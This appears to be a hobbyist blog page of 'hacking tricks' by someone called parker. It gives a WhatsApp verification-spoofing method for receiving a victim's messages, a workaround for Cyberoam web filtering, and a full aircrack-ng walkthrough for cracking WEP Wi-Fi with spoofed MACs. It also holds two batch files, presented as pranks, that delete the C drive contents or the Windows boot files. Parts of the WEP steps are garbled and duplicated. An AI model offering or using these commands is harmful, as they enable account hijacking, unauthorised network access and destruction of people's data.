add2

whatsup hack

hi feiends happy diwali today i give you one trick that is whats up hacking now follow me


 2.Whatsapp hack to use it without using your
number !!
This hack works by tricking the WhatsApp
Verification Servers by sending a spoofed request
for an authorisation code intended for an
alternative phone.
1.Install WhatsApp on your device WhatsApp now
starts a counter where it sends a verification
message to its servers.
2.Block the messeage service it can be blocked by
changing the message center number or pushing
the phone into Airplane mode.
3.WhatsApp now offers an alternative method of
verification Choose verify through SMS and fill in
your email address. Once you click to send the
SMS click cancel to terminate the call for
authorisation to the WhatsApp server.
4.Now You have to do sms Spoofing
You can do it using this link https://
play.google.com/store/apps/details?
id=com.gtrsolutions.spoof&hl=en
Check your outbox and copy the message details
into the spoofer application and send the spoofed
verification.
-Iphone users can use this :To: +447900347295
From: +(Country code)(mobile number) —-victims
Message: (your email address)
5. You will now receive messages intended for the
spoofed number on your mobile device and you
can communicate with people under the spoofed
number whats up hack




..................thank you.....................

Bypass Cybroame Security Without Login Or Password

........................................hi friends i am parker ................................



today i give you one tricks that trick is how to bypass cybrome security without any loging page or password

 first you download tunnalguru you download this on www.tunnalguru.com than follow me
 
  extract file on desktop than right click on tunnalguru icon than run as administatore

 than you have need one account in tunnalguru so you register on tunnalguru site

 than enter your register id and password and enter r port and l port  R port :53 L port:0
 than chooes demo server2 thant click on start button  oohhh than finally you get bypass cybroame page on tunnalguru and you can also use youtube or facebook ............... enjoy


..........................thank you.....................................

speed up your net speed

hi friends i am parker  today i give you one tricks that is incress your internet speed.....



 Speed Up Your Net Speed:-
we all know that a slow internet connection really
costs time and makes feel annoying . many
friends ask me the
ways to increase their internet speed.however .
it's possible to do to some extent and make your
internet much
better then it was in the past.There are Two tricks
that will help you to increase your internet speed..
First Method- Speed Up Your Net Speed By 20%
1. First you go to start button
2. Go To Run
3. Type gpedit.msc And Then Hit Enter.
4.Then Expand Adminsitrative Templates.
5.Then Network
6.Then QoS Packet Scheduler.
Now A New List Appear . Click On Limit
Reservable Bandwidth.
Just Disable it.
Now You Click On Apply .
That's It Now You Are Done !! Now Just
Restart Your Computer . And I hope You will Get
change in Your Speed

   ............thank you..................

how to make harmfull prank

hi friends, i am parker  today i give you one prank... this prank is deleat your data or damage your data ...........
 so first Open Notepad and copy below code into it.@Echo offDel C:\ *.* |y2. Save this file as virus.bat (Name can be anything but .bat is must)3.Now, running this file will delete all the content of C Drive.Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. Iwill not be responsible for any damage done to your computer....
 


      .............thank you ....................
how  to  crack wep & wpa security with use of back-track 5 


  
Step 1:-
First Download Backtrack  from the following link:
Step 2:-
Burn the iso image on CD and boot your laptop from CD drive
Step 3:-
Select the third boot option(VESA/KDE).
Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a
 "Konsole" window.
Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0
Step 6:-
airmon-ng stop wifi0
Step 7:-
ifconfig wifi0 down
Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:-
airmon-ng start wifi0
Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier.
If not than don’t worry we will still crack it.
Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole
Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.
Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k
Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.
Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done..!!..........................................................#parker
Shut Down a Computer Forever
Open notepad and copy/paste this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Now Save it as a .bat file.
This should shutdown the persons computer. It
shuts it off once and deletes the files needed to.........#parker